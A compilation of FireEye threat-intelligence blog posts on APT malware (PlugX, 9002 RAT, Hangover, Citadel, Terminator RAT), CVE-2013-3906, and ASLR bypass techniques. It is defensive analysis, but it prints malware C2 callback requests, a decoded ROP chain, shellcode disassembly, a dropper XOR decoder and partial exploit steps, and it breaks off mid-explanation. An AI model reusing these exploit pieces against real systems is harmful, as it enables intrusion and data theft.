              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


              Connection: Keep-Alive

              Cache-Control: no-cache

              PlugX (Kaba)

              The PlugX malware (aka Backdoor.APT.Kaba) has been used in a variety of targeted attacks. We located a malicious document (80c8ce1fd7622391cac892be4dbec56b) that exploits CVE-2013-3906. This sample contains the same CreateDate and ModifyDate and shares a common ZipModifyDate with both the Taidoor samples and one of the Hangover samples.

              • CreateDate                : 2013:10:03 22:46:00Z
              • ModifyDate                : 2013:10:03 23:17:00Z
              • ZipModifyDate           : 2013:10:17 14:21:23

              After exploitation, there is a connection to ( that downloads a PlugX executable:

              GET /css/css.exe HTTP/1.1

              Accept: */*

              Accept-Encoding: gzip, deflate

              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


              The malware (423eaeff2a4576365343e6dc35d22042) begins to beacon to and, which both resolve to The callback of the PlugX samples is:

              POST /8A8DAEE657205D651405D7CD HTTP/1.1

              Accept: */*

              FZLK1: 0

              FZLK2: 0

              FZLK3: 61456

              FZLK4: 1

              User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)


              Content-Length: 0

              Connection: Keep-Alive

              Cache-Control: no-cache


              An increasing number of threat groups now have access to CVE-2013-3906. These threat groups include those that use the Taidoor and PlugX malware families to conduct targeted attacks. We expect this exploit to continue to proliferate among threat groups engaged in APT activity.


              1.  The MD5 hashes for Arx group samples that dropped Napolar are:  5e4b83fd11050075a2d4913e6d81e553  and f6c788916cf6fafa202494658e0fe4ae. The CnC server was: /

              Supply Chain Analysis: From Quartermaster to Sunshop

              Today, we released a new report from FireEye Labs entitled Supply Chain Analysis: From Quartermaster to Sunshop .

              The report details how many seemingly unrelated cyber attacks may, in fact, be part of a broader offensive fueled by a shared development and logistics infrastructure — a finding that suggests some targets are facing a more organized menace than they realize. Our research points to centralized planning and development by one or more advanced persistent threat (APT) actors. Malware clearly remains a desired cyber weapon of choice. Streamlining development makes financial sense for attackers, so the findings may imply a bigger trend towards industrialization that achieves an economy of scale.

              Download the Malware Supply Report

              Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method

              Recently, we discovered a new IE zero-day exploit in the wild, which has been used in a strategic Web compromise. Specifically, the attackers inserted this zero-day exploit into a strategically important website, known to draw visitors that are likely interested in national and international security policy. We have identified relationships between the infrastructure used in this attack and that used in Operation DeputyDog. Furthermore, the attackers loaded the payload used in this attack directly into memory without first writing to disk – a technique not typically used by advanced persistent threat (APT) actors. This technique will further complicate network defenders’ ability to triage compromised systems, using traditional forensics methods.

              Enter Trojan.APT.9002

              On November 8, 2013 our colleagues Xiaobo Chen and Dan Caselden posted about a new Internet Explorer 0-day exploit seen in the wild. This exploit was seen used in a strategic Web compromise. The exploit chain was limited to one website. There were no iframes or redirects to external sites to pull down the shellcode payload.

              Through the FireEye Dynamic Threat Intelligence (DTI) cloud, we were able to retrieve the payload dropped in the attack. This payload has been identified as a variant of Trojan.APT.9002 (aka Hydraq/McRAT variant) and runs in memory only. It does not write itself to disk, leaving little to no artifacts that can be used to identify infected endpoints.

              Specifically, the payload is shellcode, which is decoded and directly injected into memory after successful exploitation via a series of steps. After an initial XOR decoding of the payload with the key "0x9F", an instance of rundll32.exe is launched and injected with the payload using CreateProcessA, OpenProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.

              figure 1Figure 1 - Initial XOR decoding of shellcode, with key '0x9F'

              figure 2a

              figure 2bfigure 2cFigure 2 – Shellcode launches rundll32.exe and injects payload

              After transfer of control to the injected payload in rundll32.exe, the shellcode is then subjected to two more levels of XOR decoding with the keys '0x01', followed by '0x6A'.

              figure 3Figure 3- Decoding shellcode with XOR key '0x01'


              figure 4Figure 4 - Decoding shellcode with XOR key '0x6A'

              Process execution is then transferred to the final decoded payload, which is a variant of the 9002 RAT.

              figure 5Figure 5 - Transfer of process execution to final decoded payload

              The fact that the attackers used a non-persistent first stage payload suggests that they are confident in both their resources and skills. As the payload was not persistent, the attackers had to work quickly, in order to gain control of victims and move laterally within affected organizations. If the attacker did not immediately seize control of infected endpoints, they risked losing these compromised endpoints, as the endpoints could have been rebooted at any time – thus automatically wiping the in-memory Trojan.APT.9002 malware variant from the infected endpoint.

              Alternatively, the use of this non-persistent first stage may suggest that the attackers were confident that their intended targets would simply revisit the compromised website and be re-infected.

              Command and Control Protocol and Infrastructure

              This Trojan.APT.9002 variant connected to a command and control server at over port 443. It uses a non-HTTP protocol as well as an HTTP POST for communicating with the remote server. However, the callback beacons have changed in this version, in comparison to the older 9002 RATs.

              The older traditional version of 9002 RAT had a static 4-byte identifier at offset 0 in the callback network traffic. This identifier was typically the string "9002", but we have also seen variants, where this has been modified – such as the 9002 variant documented in the Sunshop campaign.

              figure 6Figure 6 - Traditional 9002 RAT callback beacon

              In contrast, the beacon from the diskless 9002 payload used in the current IE 0-day attack is remarkably different and uses a dynamic 4-byte XOR key to encrypt the data. This 4-byte key is present at offset 0 and changes with each subsequent beacon. FireEye labs is aware that the 4-byte XOR version of 9002 has been in the wild for a while and is used by multiple APT actors, but this is the first time we’ve seen it deployed in the diskless payload method.

              figure 7Figure 7 - Sample callback beacons of the diskless 9002 RAT payload


              figure 8Figure 8 - XOR decrypted callback beacons of the diskless 9002 RAT payload

              The XOR decoded data always contains the static value "\x09\x12\x11\x20" at offset 16. This value is in fact hardcoded in packet data construction function prior to XOR encoding. This value most likely is the date "2011-12-09" but its significance is not known at this time.

              figure 9

              Figure 9 - Packet data construction function showing hardcoded value

              The diskless 9002 RAT payload also makes a POST request, which has also changed from the traditional version. It has Base64 stub data, instead of the static string "AA". The User-Agent string and URI pattern remain the same however. It uses the static string "lynx" in the User-Agent string and the URI is incremental hexadecimal values.

              Traditional 9002 RAT Diskless 9002 RAT
              POST /4 HTTP/1.1
              User-Agent: lynx
              Content-Length: 2
              Connection: Keep-Alive
              Cache-Control: no-cache

              POST /4 HTTP/1.1
              User-Agent: lynx
              Content-Length: 2
              Connection: Keep-Alive
              Cache-Control: no-cache

              POST /2 HTTP/1.1
              User-Agent: lynx
              Content-Length: 104
              Connection: Keep-Alive
              Cache-Control: no-cache

              POST /2 HTTP/1.1
              User-Agent: lynx
              Content-Length: 104
              Connection: Keep-Alive
              Cache-Control: no-cache


              The data in the POST stub is also encrypted with a 4-byte XOR key, and when decrypted, the data is similar to the data in the non-HTTP beacon and also has the static value "\x09\x12\x11\x20".

              Campaign Analysis

              We previously observed 104130d666ab3f640255140007f0b12d connecting to the same IP address.

              Analysis of MD5 104130d666ab3f640255140007f0b12d revealed that it shared unique identifying characteristics with 90a37e54c53ffb78969644b1a7038e8c, acbc249061a6a2fb09271a68d53567d9, and 20854f54b0d03118681410245be39bd8.

              MD5 acbc249061a6a2fb09271a68d53567d9 and 90a37e54c53ffb78969644b1a7038e8c are both Trojan.APT.9002 variants and connect to a command and control server at

              MD5 20854f54b0d03118681410245be39bd8 is another Trojan.APT.9002 variant. This variant connected to a command and control server at

              Passive DNS analysis of this domain revealed that it resolved to between 2011-09-23 and 2011-10-21. The following other domains have also been seen resolving to this same IP address:

              Domain First Seen Last Seen
     2011-12-08 2011-12-08 2012-01-31 2012-01-31
     2011-12-23 2011-12-23 2012-01-10 2012-01-10
     2012-02-20 2012-02-20 2012-02-22 2012-02-22
     2011-12-01 2011-12-01 2012-02-22 2012-02-22

              If the domain rings a bell, it should. While covering a different Internet Explorer Zero-day (CVE-2013-3893) and the associated Operation DeputyDog campaign, we reported that the CnC infrastructure used in that campaign overlapped with this same domain:

              Inside the in-memory version of the Trojan.APT.9002 payload used in this strategic Web compromise, we identified the following interesting string: “rat_UnInstall”. Through DTI, we found this same string present in a number of different samples including the ones discussed above:





              Based on this analysis, all of these samples, including the in-memory variant, can be detected with the following simple YARA signature:

              rule FE_APT_9002_rat



                      author = "FireEye Labs"


                      $mz = {4d 5a}

                      $a = "rat_UnInstall" wide ascii


                      ($mz at 0) and $a


              We also found the following strings of interest present in these above 9002 RAT samples (excluding the in-memory variant):



              These strings were all observed and highlighted by Bit9 here. As Bit9 notes in their blog, Trojan.APT.9002 (aka Hydraq/McRAT) was also used in the original Operation Aurora campaign, and the “rat_UnInstall” string can be found in the original Aurora samples confirming the lineage.


              By utilizing strategic Web compromises along with in-memory payload delivery tactics and multiple nested methods of obfuscation, this campaign has proven to be exceptionally accomplished and elusive. APT actors are clearly learning and employing new tactics. With uncanny timing and a penchant for consistently employing Zero-day exploits in targeted attacks, we expect APT threat actors to continue to evolve and launch new campaigns for the foreseeable future. Not surprisingly, these old dogs continue to learn new tricks.

              FireEye Labs would like to thank iSIGHT Partners for their assistance with this research.

              The Dual Use Exploit: CVE-2013-3906 Used in Both Targeted Attacks and Crimeware Campaigns

              A zero-day vulnerability was recently discovered that exploits a Microsoft graphics component using malicious Word documents as the initial infection vector. Microsoft has confirmed that this exploit has been used in “attacks observed are very limited and carefully carried out against selected computers, largely in the Middle East and South Asia.”

              Our analysis has revealed a connection between these attacks and those previously documented in Operation Hangover, which adds India and Pakistan into the mix of targets. Information obtained from a command-and-control server (CnC) used in recent attacks leveraging this zero-day exploit revealed that the Hangover group, believed to operate from India, has compromised 78 computers, 47 percent of those in Pakistan.

              However, we have found that another group also has access to this exploit and is using it to deliver the Citadel Trojan malware. This group, which we call the Arx group, may have had access to the exploit before the Hangover group did. Information obtained from CnCs operated by the Arx group revealed that 619 targets (4024 unique IP addresses) have been compromised. The majority of the targets are in India (63 percent) and Pakistan (19 percent).

              Exploit Analysis

              The CVE-2013-3906 vulnerability is a heap overflow that occurs when processing TIFF image files with user-controlled allocation and copy size. A function pointer is overwritten and later called to execute code. Exploiting this vulnerability requires the attacker to be able to control the memory layout — which the Hangover and Arx groups did by using a new ActiveX heap-spray technique.

              Different ActiveX Heap-spray Method

              Judging from samples in the wild that we analyzed, both groups sprayed the heap using the new ActiveX method, but did so slightly differently. The Arx group used a slightly more clever approach to spray the same amount of memory using fewer objects in their exploit document.

              Different ROP Payload

              The Hangover group’s exploit mainly targets Windows XP because Microsoft Office offers NO Data Execution Prevention (DEP) protection by default, and the exploit doesn’t use return-oriented programming (ROP).

              The Arx group, by contrast, uses ROP gadgets from the MSCOMCTL.DLL. In our tests, the ROP payload works for DLL version

              Decoded below are the various ROP chains used in the Arx group’s exploits:

              Stack pivot:

              275b4f3f 94 xchg eax,esp

              275b4f40 0100 add dword ptr [eax],eax

              275b4f42 5e pop esi

              275b4f43 5d pop ebp

              275b4f44 c21c00 ret 1Ch

              Pop VirtualAlloc IAT from the new stack:

              2761bdea 58 pop eax

              2761bdeb c3 ret

              Calling virtualAlloc to allocate RWX memory at 0x20000000:

              275a58fe ff20 jmp dword ptr [eax] ds:0023:275811c8={kernel32!VirtualAlloc (7c809af1)}

              Pop the length of the shell code:

              27594a33 59 pop ecx

              27594a34 c3 ret

              Pop destination or source location for a memory copy:

              2759a93f 5f pop edi

              2759a940 5e pop esi

              2759a941 c3 ret

              Copy the shell code to 0x20000000:

              275ceb04 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]

              275ceb06 33c0 xor eax,eax

              275ceb08 eb24 jmp MSCOMCTL!DllGetClassObject+0x3860 (275ceb2e)

              After the copy, it returns to 0x20000000 to execute the shell code:

              275ceb2f 5f pop edi

              275ceb2f 5e pop esi

              275ceb30 5b pop ebx

              275ceb31 5d pop ebp

              275ceb32 c3 ret

              Different Shellcode

              The Hangover group is using the URL Download shell code, but with a hook-hopping technique:


              ;; Check if target has been hooked with an absolute call instruction

              001C205F cmp byte ptr [eax],0xE8

              001C2062 jz 001C2073

              ;; Check if target has been hooked with an absolute jump instruction

              001C2064 cmp byte ptr [eax],0xE9

              001C2067 jz 001C2073

              ;; Check if target has been hooked with a software breakpoint

              001C2069 cmp byte ptr [eax],0xCC

              001C206C jz 001C2073

              001C206E cmp byte ptr [eax],0xEB

              001C2071 jnz 001C2084

              001C2073 cmp dword ptr [eax+0x5],0x90909090

              001C207A jz 001C2084

              001C207C mov edi,edi

              001C207E push ebp

              001C207F mov ebp,esp

              001C2081 lea eax,[eax+0x5]

              001C2084 jmp eax

              The hook-hopping technique was enabled for all API calls in this shell code, such as LoadlibraryA, GetTempPathA, URLDownloadToFileA, ShellExecuteA, and ExitProcess.

              The Arx group’s shell code uses the NTAccessCheckAndAuditAlarm system call to search memory for the dropper, then calls loadLibrary to load the dropper.  NTAccessCheckAndAuditAlarm is one safe way to search memory to avoid access violations when accessing unmapped memory addresses. Upon finding the right memory location, the dropper XOR method is different, which is not easy to decode with brute force.

              B5 00 9B B1 B5 00 9B B1 3A 9E 00 BA 04 00 77 82

              The first two DWORDs are the signature used to locate the binary by the NTAccessCheckAndAuditAlarm system call.

              0x3A is the first XOR key and 0x9E is the second XOR key. 0x0004BA00 is the dropper file’s length.

              The XOR algorithm is described below. The algorithm takes two keys. The first key is XORed against the ciphertext, and the second key is added to the first key, after each XOR operation:

              def xor(a, key, key2):

              x = bytearray(a)

              for i in range(len(x)):

              x[i] ^= key&0xff

              key += key2

              return x

              The Hangover Group

              As previously documented, “Operation Hangover” was a multi-year series of coordinated campaigns targeting systems around the world with a primary focus on organizations in Pakistan. “Operation Hangover” was uncovered, after the attackers responsible for this campaign targeted Telenor, a major Norwegian telecommunications provider. The Hangover group is believed to have been operating as early as 2009.

              Cluster and Protocol Analysis

              The related samples were uploaded to VirusTotal between 2013-10-23 and 2013-10-31. This provides an indication of when CVE-2013-3906 was first used by the Hangover group. The EXIF data contained within the malicious Word documents used by the group, which is likely an artifact of the builder, contain these dates:

              • CreateDate: 2013:10:03 22:46:00Z
              • ModifyDate: 2013:10:03 23:17:00Z

              As such, it appears that the Hangover group acquired the exploit in October 2013. Elements of the CnC infrastructure were already place, suggesting that Hangover was using it before acquiring this zero-day exploit.


              All but one of the samples can be linked through “” — the website from which malware files are downloaded after initial exploitation. As for the exception, we believe that this cluster is probably related because the EXIF data in the malicious Word document aligns with the other Hangover samples.

              The malware files that are downloaded after exploitation have three different callbacks. The first, which is the “classic” Hangover HTTP callback, follows this format:

              GET /logitech/rt.php?cn=[HOSTNAME]@[USERNAME]&str=&file=no HTTP/1.1

              User-Agent: WinInetGet/0.1


              Connection: Keep-Alive

              Cache-Control: no-cache

              The second type of callback looks like this:

              GET /NewsApp/rssfeed.php?a=[TEXT]&134416 HTTP/1.1

              Accept: */*

              Accept-Encoding: gzip, deflate

              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


              Connection: Keep-Alive

              The third type of callback is:

              GET /amd/psp.php?p=1&g=[TEXT]&v=RE[]&s=MicrosoftWindowsXPProfessional-32&t=[HOSTNAME]-[USERNAME]&r=[0]&X9S8T3 HTTP/1.1

              Accept: */*

              Accept-Encoding: gzip, deflate

              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


              Connection: Keep-Alive

              CnC Analysis

              For each compromised system that checked-in to the CnC server, a directory was created on the server in the format of “<machine name>@<username>.” Within each directory, three files are created: Info.txt, Result.txt, and index.html.  The index.html was a simple html file listing the directory contents on the server.  Info.txt detailed the target's machine name, username, IP address, and the antivirus product installed, if any:

              Info.txt Output

              User : machinename@username

              IP :  <target IP address>

              AV : <Antivirus product installed on target machine>

              It appears that when the target systems successfully checked in to the CnC server, the server could push down an executable file to be executed on the targeted system. The result of that action was recorded in Result.txt.

              Result.txt Output

              Result : svchost.exe======failed

              Result : svchoste.exe======sucessfully

              Result : taskngr.exe======sucessfully

              Result : lgfxsrvc.exe======successfully

              (Note: “successfully” was spelled properly in the last entry, but not in the preceding entries.)

              We obtained a number of these second-stage executables listed in the Result.txt output from a Hangover-linked CnC server.  These executables included a variety of tools including a reverse shell backdoor, a keylogger, a screenshot grabber, and a document exfiltration tool.

              The domains and IP addresses associated with these second stage tools are:


              These second-stage tools are discussed in more detail in here.

              Target Analysis

              The data we obtained from one of the Hangover CnC servers reveals 78 targets (based on unique IP addresses). But to be clear: this list likely includes a variety of researchers who were investigating the malware.  A total of 47 percent of the IP addresses were in ranges assigned to Pakistan. This is consistent with the known targeting preferences of the Hangover group.


              The Arx Group

              During our investigation, we found another set of samples that were also exploiting this same zero-day vulnerability. These samples drop the Citadel Trojan. Citadel is a variant of the Zeus Trojan that emerged in 2012 after the Zeus source code was leaked. Citadel is designed to allow cybercriminals to steal banking information and account credentials.

              Malware Analysis

              Malware linked to the Arx group is usually sent out in “SWIFT Payment” emails. These emails are common in spam campaigns and typically drop banking Trojans and other crimeware.


              After opening the file, a decoy document is shown to the user. (In this example, the attackers made a mistake and confused the dropped executable with the decoy document.)


              Upon further analysis, we found that the malware payload within these samples is the Citadel Trojan.  The samples were uploaded to VirusTotal between 2013-09-26 and 2013-10-31, which provides an indication of when this group obtained the zero-day exploit. The EXIF data contained within the malicious Word documents, which is likely an artifact of the builder, contain the following dates:

              • CreateDate : 2013:03:22 19:59:00Z
              • ModifyDate : 2013:03:22 20:02:00Z

              Other decoy documents used by the Arx group:


              Possible testing:

              The  CnC infrastructure for these Citadel samples cluster into three groups, but they employ common decoy documents (the document opened after exploitation).


              Next, we focused on the cluster of CnC servers registered by “”. This email address has also been used on underground forums by someone interested in purchasing compromised SMTP servers.


              The individual using this email address may also use the alias “cutedguy247.”


              Target Analysis

              Based on information we retrieved from two CnC servers, the Citadel botnet operated by “” has 619 targets (based on the unique ID assigned by the malware) that checked in with 4024 IP addresses. The compromised systems begin calling back to the first CnC server on October 3rd, 2013, while the earliest callback to the second CnC server is Oct. 4, 2013. Using the geolocation of the IP addresses, we observed that the majority of the targets are located in India (63 percent ) and Pakistan (19 percent).




              The use of this zero-day exploit (CVE-2013-3906) is more widespread that previously believed. Two different groups are using this exploit: Hangover and Arx. Hangover has been previously connected with a targeted malware campaign, and the Arx group is operating a Citadel-based botnet for organized crime.

              Based on this analysis, the Arx group appears to have had access to this zero-day exploit before the Hangover group.

              Although we have not been able to connect the activities of the Hangover and Arx groups, they share one interesting feature: an India-Pakistan nexus.

              Evasive Tactics: Terminator RAT

              FireEye Labs has been tracking a variety of advanced persistent threat (APT) actors that have been slightly changing their tools, techniques, and procedures (TTPs) in order to evade network defenses. Earlier, we documented changes to Taidoor, a malware family that is being used in ongoing cyber-espionage campaigns particularly against entities in Taiwan. In this post we will explore changes made to Terminator RAT (Remote Access Tool) by examining a recent attack against entities in Taiwan.

              We recently analyzed a sample that we suspect was sent via spear-phishing emails to targets in Taiwan. As shown in Figure 1, the adversary sends a malicious Word document, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7), that exploits CVE-2012-0158, which subsequently drops a malware installer named “DW20.exe”. This particular malware is interesting because of the following:

              • It evades sandbox by terminating and removing itself (DW20.exe) after installing. Malicious behavior will only appear after reboot.
              • It deters single-object based sandbox by segregation of roles between collaborating malwares. The RAT (svchost_.exe) will collaborate with its relay (sss.exe) to communicate with the command and control server.
              • It deters forensics investigation by changing the startup location.
              • It deters file-based scanning that implements a maximum file size filter, by expanding the size of svchost_.exe to 40MB.

              The ultimate payload of the attack is Terminator RAT, which is also known as FakeM RAT. This RAT does not appear to be exclusively used by a single APT actor, but is most likely being used in a variety (of possibly otherwise unrelated) campaigns. In the past, this RAT has been used against Tibetan and Uyghur activists, and we are seeing an increasing number of attacks targeting Taiwan as well.

              However, these attacks use some evasive tactics that demonstrate the evolution of Terminator RAT. First, the attackers have included a component that relays traffic between the malware and a proxy server. Second, they have modified the 32-byte magic header that in previous versions attempted to disguise itself to look like either MSN Messenger, Yahoo! Messenger, or HTML code.

              These modifications appear to be an attempt to evade network defenses, perhaps in response to defender’s increasing knowledge of the indicators of compromise associated with this malware. We will discuss the individual components of this attack in more detail.

              [caption id="attachment_3596" align="alignnone" width="585"]Figure 1 Figure 1[/caption]


              1.   DW20.exe (MD5: 7B18E1F0CE0CB7EEA990859EF6DB810C)


              DW20.exe was found to be the installation executable file. It will first create its working folders located at “%UserProfile%\Microsoft” and “%AppData%\2019”. The former is used to store the configurations and executable files (svchost_.exe and sss.exe) and the latter is used to store the shortcut link files. This folder “2019” was then configured to be the new start up folder location by changing the registry “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup" with the location of its path (see Figure 2).

              [caption id="attachment_3597" align="alignnone" width="575"]Figure 2 Figure 2[/caption]

              The executable file “sss.exe” was found to be the decrypted form of the resource named 140 with type “ACCELORATOR” (likely misspelling of Accelerator - see Figure 3). This resource was decrypted using customized XTEA algorithm and appended with an encrypted configuration for the domains and ports.

              [caption id="attachment_3598" align="alignnone" width="307"]Figure 3 Figure 3[/caption]

              After installation, DW20.exe deletes and terminates itself. The malwares will only run after reboot. This is one effective way to evade sandbox automatic analysis, as malicious activity will only reveal after a reboot.


              2.   sss.exe (MD5: 93F51B957DA86BDE1B82934E73B10D9D)


              sss.exe is an interesting malware component. As a researcher would analyze it independently, it is not considered a malicious program. This component plays the role as a network relay between the malware and the proxy server, by listening over port 8000. To achieve this, it first tries to identify the list of proxy servers that are used within the system using “WinHttpGetIEProxyConfigForCurrentUser”, and the discovered proxy servers and related ports are stored in the same directory in a file named “PROXY” (see Figure 4).

              [caption id="attachment_3599" align="alignnone" width="425"]Figure 4 Figure 4[/caption]

              When there is a new incoming TCP connection over port 8000, it will attempt to create a local to proxy socket connection. With that, it will check connectivity with the CnC server. If the response is 200, it will then start to create a “relay link” between the malware and the CnC server (see Figure 5). The “relay link” was created using two threads, where one thread will transfer data from socket 1 to socket 2 (see Figure 6) and the other will do vice versa.

              [caption id="attachment_3600" align="alignnone" width="654"]Figure 5 Figure 5[/caption]


              [caption id="attachment_3601" align="alignnone" width="497"]Figure 6 Figure 6[/caption]

              As depicted in Figure 7, the user agent is hard coded. It is a possible means to identify potentially malicious traffic, as Internet Explorer 6 is significantly outdated and “MSIE” is not a valid version token.


              Figure 7
              Figure 7


              The configurations for the malicious domains and ports to use are located at the last 188 bytes of the executable file (see Figure 8). The first 16 bytes is the key (boxed in red) to decrypt the remaining content using modified XTEA algorithm (see Figure 9). The two malicious domains found were “” and “”

              [caption id="attachment_3603" align="alignnone" width="645"]Figure 8 Figure 8[/caption]

              [caption id="attachment_3604" align="alignnone" width="639"]Figure 9 Figure 9[/caption]


              3.   Network Traffic


              The Terminator sample we analyzed, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7) was not configured with fake HTML, Yahoo Messenger, or Windows Messenger traffic header as it had in past variants. However, the content is encrypted in exactly the same way as previous versions of Terminator RAT.

              [caption id="attachment_3605" align="alignnone" width="648"]Figure 10 Figure 10[/caption]

              The decrypted content reveals that the malware is sending back the user name, the computer name and a campaign mark of “zjz1020”.

              [caption id="attachment_3606" align="alignnone" width="683"]Figure 11 Figure 11[/caption]

              This particular sample is configured to one of two command and control servers:



              • /
              • /

              We have located another malicious document that has a Taiwan-related decoy document that drops this same version of Terminator RAT.

              [caption id="attachment_3607" align="alignnone" width="583"]Figure 12 Figure 12[/caption]

              The sample we analyzed (md5: 50d5e73ff8a0693ed2ee2d320af3b304) exploits CVE-2012-0158 and has the following command and control server:

              •  /

              The command and control servers for both samples resolved to IP addresses in the same class C network.


              4.   Campaign Connections


              In June 2013, we investigated an attack against entities in Taiwan that used spear-phishing emails to deliver a malicious attachment.

              [caption id="attachment_3608" align="alignnone" width="455"]Figure 13 Figure 13[/caption]

              The malicious attachment "標案資料.doc" (md5: bfc96694731f3cf39bcad6e0716c5746) exploited a vulnerability in Microsoft Office (CVE-2012-0158), however, the payload in this case was a different malware family known as WinData. The malware connected to the same command and control server,, but the callback is quite different:

              XYZ /WinData.DLL?HELO-STX-1*1[IP Address]*[Computer Name]*0605[MAC:[Mac Address]]$

              In a separate case where has been used as the command and control server, the payload was neither WinData nor Terminator RAT, but another type of malware known as Protux. The sample we analyzed in August 2012 for this case was “幹!.doc” (md5: 01da7213940a74c292d09ebe17f1bd01).

              This particular threat actor has access to a variety of malware families and has been using them to target entities in Taiwan for more than a year.




              Terminator RAT is an example of how malware are increasingly becoming more sophisticated and harder to detect. There is a need for continual research to understand various techniques, tactics, and procedures used by the adversaries. Detection of exploitation and identification of anomalous callbacks are becoming extremely critical in preventing the malware from installing into the system or phoning back to the command control servers.


              Update: Ad Vulna Continues

              This is an update to our earlier blog “Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions”.

              Since our last notification to Google and Ad Vulna (code name for anonymity), we have noticed a number of changes to the impacted apps that we reported to both companies. We summarize our observations below, although we do not have specific information about the reasons that caused these changes we are reporting.

              First, a number of these vulnaggressive apps and their developers’ accounts have been removed from Google Play, such as app developer "Itch Mania". The total number of downloads of these apps was more than 6 million before the removal. While removing these apps from Google Play prevents more people from being affected, the millions of devices that already downloaded them remain vulnerable.

              Second, a number of apps from the list that we reported to Google and Ad Vulna have updated the ad library included in the app to the newest version which fixes many of the security issues we found. Moreover, a number of other apps, such as “Mr. Number Blocker” with more than 5 million downloads, have simply removed Ad Vulna. The total number of downloads of these apps before they were updated was more than 26 million. Unfortunately, many users do not update their downloaded apps often and older versions of android does not auto-update apps, so millions of users of these apps will remain vulnerable until they update to the latest version of the apps.

              From our current analysis, there are still many other apps using the vulnaggressive versions of the ad library Ad Vulna on Google Play, with more than 166 million downloads in total. FireEye recently announced FireEye Mobile Threat Prevention. It is uniquely capable of protecting its customers from such threats.

              We are glad to see that security researchers, practitioners, and users worldwide are becoming more aware of the security risks brought by this new class of vulnaggressive threats after our last blog.

              ASLR Bypass Apocalypse in Recent Zero-Day Exploits

              ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operation systems. But it’s not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR.

              Here are just a few interesting bypass techniques that we have tracked in the past year:

              • Using non-ASLR modules
              • Modifying the BSTR length/null terminator
              • Modifying the Array object

              The following sections explain each of these techniques in detail.

              Non-ASLR modules

              Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL.

              MSVCR71.DLL, JRE 1.6.x is shipped an old version of the Microsoft Visual C Runtime Library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations:

              • Windows 7 and Internet Explorer 8
              • Windows 7 and Internet Explorer 9

              HXDS.DLL, shipped from MS Office 2010/2007, is not compiled with ASLR. This technique was first described in here, and is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. This DLL is loaded when the browser loads a page with ‘ms-help://’ in the URL.

              The following zero-day exploits used at least one of these techniques to bypass ASLR: CVE-2013-3893, CVE2013-1347, CVE-2012-4969, CVE-2012-4792.


              The non-ASLR module technique requires IE 8 and IE 9 to run with old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office can prevent this type of attack.

              Modify the BSTR length/null terminator

              This technique first appears in the 2010 Pwn2Own IE 8 exploit by Peter Vreugdenhil. It applies only to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing or decreasing the content of a memory pointer.

              The arbitrary memory write does not directly control EIP. Most of the time, the exploit overwrites important program data such as function pointers to execute code. For attackers, the good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can then use the same memory corruption bug to control EIP.

              Few vulnerabilities can be used to modify the BSTR length. For example, some vulnerabilities can only increase/decrease memory pointers by one or two bytes. In this case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR have the concatenated object’s content as part of BSTR, where attackers can usually find information related to DLL base addresses.


              The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable:


              Consider the following memory layout before the DEC operation:

              [string][null][non-null data][object]

              After the DEC operation (in my tests, it is decreased twice) the memory becomes:

              [string][\xfe][non-null data][object]

              For further details, refer to the technique write-up from the immunityinc’s blog.


              This technique usually requires multiple writes to leak the necessary info, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/fengshui, so sometimes the attacker must use the VBArray technique to craft the heap layout.

              Modify the Array object

              The array object length modification is similar to the BSTR length modification: they both require a certain class of “user-friendly” vulnerabilities. Even batter, from the attacker’s view, is that once the length changes, the attacker can also arbitrarily read from or write to memory — or basically take control of the whole process flow and achieve code execution.

              Here is the list of known zero-day exploits using this technique:


              This exploit involves Adobe Flash player regex handling buffer overflow. The attacker overwrites the length of a Vector.<Number> object, and then reads more memory content to get base address of flash.ocx.

              Here’s how the exploit works:

              1. Set up a continuous memory layout by allocating the following objects":13
              2. Free the <Number> object at index 1 of the above objects as follows:

                obj[1] = null;
              3. Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows:

                boom = "(?i)()()(?-i)||||||||||||||||||||||||";
                var trigger = new RegExp(boom, "");

